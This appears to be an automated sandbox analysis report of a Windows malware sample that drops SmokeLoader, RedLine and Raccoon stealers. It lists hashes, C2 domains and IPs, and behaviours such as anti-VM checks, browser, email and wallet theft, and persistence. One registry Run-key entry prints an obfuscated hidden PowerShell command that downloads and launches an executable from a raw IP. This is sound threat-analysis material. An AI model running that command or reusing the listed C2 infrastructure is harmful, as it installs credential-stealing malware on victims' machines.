Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
12-08-2021 05:36
Static task
static1
Behavioral task
behavioral1
Sample
C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
Resource
win10v20210410
General
-
Target
C4FF50648C4FB9E60E0F0C30A41BBA2C.exe
-
Size
192KB
-
MD5
c4ff50648c4fb9e60e0f0c30a41bba2c
-
SHA1
074731d50321f109427d2eb4ce0b6ee5e47e9d4a
-
SHA256
c15ff185f489812fa7ae3fe20c668f9611da7a2a3e54367adf0c28bf456d0720
-
SHA512
11b05e41a38a578004eed41bb01d5b57253b77f6985d2a0685d9dc037730976b7fedd24d8c6ebb201530479ced0cc98bbf522287fddca3b043a90d8ffd8824d5
Malware Config
Extracted
http://91.241.19.52/Api/GetFile2
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
redline
@gasfer_dark
207.154.240.76:80
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
-
url4cnc
https://telete.in/p1rosto100xx
Signatures
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4968 1612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4964 1612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1152 1612 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5048 1612 schtasks.exe -
Raccoon Stealer Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1192-188-0x0000000000400000-0x0000000000946000-memory.dmp family_raccoon behavioral2/memory/2496-541-0x000000000044003F-mapping.dmp family_raccoon behavioral2/memory/2496-543-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\85C1.exe family_redline C:\Users\Admin\AppData\Local\Temp\85C1.exe family_redline C:\Users\Admin\AppData\Local\Temp\949A.exe family_redline C:\Users\Admin\AppData\Local\Temp\949A.exe family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 35 2528 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
7B11.exe7B11.tmp7B11.exe7B11.tmp85C1.exe8A56.exefsucenter.exe8D54.exe90B1.exeRuntimebroker.exe949A.exe8D54.exeDatabase.exeDatabase.exeinstall.exeHostData.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeinstall.exeDatabase.exeDatabase.exeDatabase.exesihost.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exepid process 1152 7B11.exe 3784 7B11.tmp 2112 7B11.exe 812 7B11.tmp 4036 85C1.exe 3916 8A56.exe 832 fsucenter.exe 2684 8D54.exe 1192 90B1.exe 3256 Runtimebroker.exe 2004 949A.exe 2496 8D54.exe 4448 Database.exe 4492 Database.exe 4532 install.exe 4556 HostData.exe 4588 Database.exe 4680 Database.exe 4732 Database.exe 4856 Database.exe 4940 Database.exe 4980 Database.exe 5020 Database.exe 5060 Database.exe 5100 Database.exe 2704 Database.exe 4160 Database.exe 3740 Database.exe 2516 Database.exe 4208 Database.exe 1124 Database.exe 3916 Database.exe 1992 Database.exe 916 Database.exe 824 Database.exe 184 Database.exe 1380 Database.exe 3516 Database.exe 3528 Database.exe 600 Database.exe 3196 Database.exe 4476 Database.exe 1176 Database.exe 4496 Database.exe 4564 Database.exe 4672 Database.exe 4648 Database.exe 4720 Database.exe 4792 Database.exe 4804 install.exe 4852 Database.exe 4912 Database.exe 4984 Database.exe 4052 sihost.exe 5104 Database.exe 4992 Database.exe 1192 Database.exe 2312 Database.exe 5032 Database.exe 3828 Database.exe 1328 Database.exe 4248 Database.exe 4268 Database.exe 2836 Database.exe -
Checks BIOS information in registry 2 TTPs 64 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe85C1.exeDatabase.exeDatabase.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 85C1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Database.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Database.exe -
Deletes itself 1 IoCs
Processes:
pid process 3064 -
Drops startup file 1 IoCs
Processes:
Runtimebroker.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe -
Loads dropped DLL 7 IoCs
Processes:
fsucenter.exe90B1.exe8D54.exepid process 832 fsucenter.exe 1192 90B1.exe 1192 90B1.exe 1192 90B1.exe 1192 90B1.exe 1192 90B1.exe 2496 8D54.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\85C1.exe themida C:\Users\Admin\AppData\Local\Temp\85C1.exe themida behavioral2/memory/4036-141-0x0000000000D30000-0x0000000000D31000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
install.exepowershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\ProgramData\\Mozilla\\updates\\308046B0AF4A39CB\\services.exe\"" install.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\ProgramData\\Templates\\explorer.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files\\Google\\Chrome\\Application\\SetupMetrics\\RuntimeBroker.exe\"" install.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Program Files\\7-Zip\\Lang\\sihost.exe\"" install.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe85C1.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 85C1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Database.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
85C1.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exepid process 4036 85C1.exe 4448 Database.exe 4448 Database.exe 4448 Database.exe 4492 Database.exe 4492 Database.exe 4492 Database.exe 4588 Database.exe 4588 Database.exe 4588 Database.exe 4680 Database.exe 4680 Database.exe 4680 Database.exe 4732 Database.exe 4732 Database.exe 4732 Database.exe 4856 Database.exe 4856 Database.exe 4856 Database.exe 4940 Database.exe 4940 Database.exe 4940 Database.exe 4980 Database.exe 4980 Database.exe 4980 Database.exe 5020 Database.exe 5020 Database.exe 5020 Database.exe 5060 Database.exe 5060 Database.exe 5060 Database.exe 5100 Database.exe 5100 Database.exe 5100 Database.exe 2704 Database.exe 2704 Database.exe 2704 Database.exe 4160 Database.exe 4160 Database.exe 4160 Database.exe 3740 Database.exe 3740 Database.exe 3740 Database.exe 2516 Database.exe 2516 Database.exe 2516 Database.exe 4208 Database.exe 4208 Database.exe 4208 Database.exe 1124 Database.exe 1124 Database.exe 1124 Database.exe 3916 Database.exe 3916 Database.exe 3916 Database.exe 1992 Database.exe 1992 Database.exe 1992 Database.exe 916 Database.exe 916 Database.exe 916 Database.exe 824 Database.exe 824 Database.exe 824 Database.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
C4FF50648C4FB9E60E0F0C30A41BBA2C.exe8D54.exeinstall.exedescription pid process target process PID 4020 set thread context of 2388 4020 C4FF50648C4FB9E60E0F0C30A41BBA2C.exe C4FF50648C4FB9E60E0F0C30A41BBA2C.exe PID 2684 set thread context of 2496 2684 8D54.exe 8D54.exe PID 4532 set thread context of 4804 4532 install.exe install.exe -
Drops file in Program Files directory 2 IoCs
Processes:
install.exedescription ioc process File created C:\Program Files\7-Zip\Lang\66fc9ff0ee96c2b21f0cfded48750ae9e3032bf3 install.exe File created C:\Program Files\7-Zip\Lang\sihost.exe install.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4252 2496 WerFault.exe 8D54.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
C4FF50648C4FB9E60E0F0C30A41BBA2C.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C4FF50648C4FB9E60E0F0C30A41BBA2C.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C4FF50648C4FB9E60E0F0C30A41BBA2C.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C4FF50648C4FB9E60E0F0C30A41BBA2C.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4968 schtasks.exe 4964 schtasks.exe 1152 schtasks.exe 5048 schtasks.exe -
Modifies registry class 2 IoCs
Processes:
description ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance -
Processes:
fsucenter.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 fsucenter.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f